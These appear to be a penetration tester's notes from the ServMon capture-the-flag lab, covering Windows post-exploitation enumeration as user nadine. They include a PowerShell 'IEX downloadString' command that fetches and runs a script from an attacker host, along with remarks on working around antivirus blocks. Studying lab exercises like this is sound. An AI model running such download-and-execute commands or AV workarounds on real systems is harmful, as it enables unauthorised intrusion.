4 box enum nadine

# some AV is blocking file writes and file downloads
# remotely running PowerUp.ps1 via IEX is failing.
| This script contains malicious content and has been blocked by your antivirus software.

nadine@SERVMON C:\inetpub>dir
 Directory of C:\inetpub

08/04/2020  23:21    <DIR>          .
08/04/2020  23:21    <DIR>          ..
08/04/2020  23:09    <DIR>          ftproot
14/01/2020  20:01    <DIR>          logs

# nothing in ftproot
# looking for the same files as in ftp
nadine@SERVMON C:\>dir /b /s "Confidential.txt"
C:\Shared\Users\Nadine\Confidential.txt

# we can write files here.
# certutil.exe is failing; PS wget works

# PowerUp is failing due to AV checks
# win.exe is failing to execute.
# need to enumerate manually

# net user <>
| both nadine and nathan are just *USERS
| Administrator is in 'administrators' localgroup

# running Get-RemoteProgram.ps1
nadine@SERVMON C:\Shared\Users\Nadine>powershell -exec bypass IEX(New-Object Net.WebClient).downloadString('http://10.10.16.7/Get-RemoteProgram.ps1')

ComputerName ProgramName
------------ -----------
SERVMON      VMware Tools
SERVMON      NSClient++ (x64)
SERVMON      Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
SERVMON      Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X64 Additional Runtime - 14.27.29016
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.27.29016
SERVMON      Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.27.29016
SERVMON      Microsoft Visual C++ 2019 X86 Additional Runtime - 14.27.29016
SERVMON      Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
SERVMON      NVMS-1000
SERVMON      Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.27.29016
SERVMON      Microsoft OneDrive
